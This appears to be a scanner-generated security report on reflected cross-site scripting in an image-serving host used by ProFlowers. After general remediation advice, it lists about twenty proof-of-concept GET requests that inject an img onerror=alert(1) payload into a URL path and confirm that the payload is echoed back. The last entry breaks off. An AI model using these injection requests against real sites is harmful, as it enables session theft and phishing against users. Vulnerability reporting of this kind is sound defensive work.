Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf was submitted in the REST URL parameter 9. This input was echoed as d8888<img src=a onerror=alert(1)>c39920fb3bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_testd8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e was submitted in the REST URL parameter 9. This input was echoed as a0878<img src=a onerror=alert(1)>06ac558497e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c was submitted in the REST URL parameter 9. This input was echoed as a5804<img src=a onerror=alert(1)>df92fde2c2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PFa5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805 was submitted in the REST URL parameter 9. This input was echoed as a503d<img src=a onerror=alert(1)>f24d80e0805 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f was submitted in the REST URL parameter 9. This input was echoed as 7a004<img src=a onerror=alert(1)>e672d11766f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload aa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731 was submitted in the REST URL parameter 9. This input was echoed as aa1f8<img src=a onerror=alert(1)>2379bea6731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded was submitted in the REST URL parameter 9. This input was echoed as 93aff<img src=a onerror=alert(1)>e77f28a9ded in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34 was submitted in the REST URL parameter 9. This input was echoed as 3e084<img src=a onerror=alert(1)>6d551d44b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97 was submitted in the REST URL parameter 9. This input was echoed as 360ac<img src=a onerror=alert(1)>d12f5cff97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72 was submitted in the REST URL parameter 9. This input was echoed as 809b9<img src=a onerror=alert(1)>db4c58a7a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de was submitted in the REST URL parameter 9. This input was echoed as 70245<img src=a onerror=alert(1)>3f5fb4274de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e was submitted in the REST URL parameter 9. This input was echoed as 58380<img src=a onerror=alert(1)>53b2f6a2f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5 was submitted in the REST URL parameter 9. This input was echoed as 85dbd<img src=a onerror=alert(1)>62480e56d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3 was submitted in the REST URL parameter 9. This input was echoed as 58a40<img src=a onerror=alert(1)>eed651848d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e was submitted in the REST URL parameter 9. This input was echoed as c75a4<img src=a onerror=alert(1)>d12803aeb3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e was submitted in the REST URL parameter 9. This input was echoed as 733a8<img src=a onerror=alert(1)>699c828870e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6 was submitted in the REST URL parameter 9. This input was echoed as 2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e was submitted in the REST URL parameter 9. This input was echoed as 6a737<img src=a onerror=alert(1)>47eeba19c2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d was submitted in the REST URL parameter 9. This input was echoed as e3afe<img src=a onerror=alert(1)>9e93c1e129d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb was submitted in the REST URL parameter 9. This input was echoed as a76a3<img src=a onerror=alert(1)>b2c254cdacb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PFa76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef was submitted in the REST URL parameter 9. This input was echoed as 995b4<img src=a onerror=alert(1)>39f37b6a9ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967 was submitted in the REST URL parameter 9. This input was echoed as d7a61<img src=a onerror=alert(1)>2d0b0eab967 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
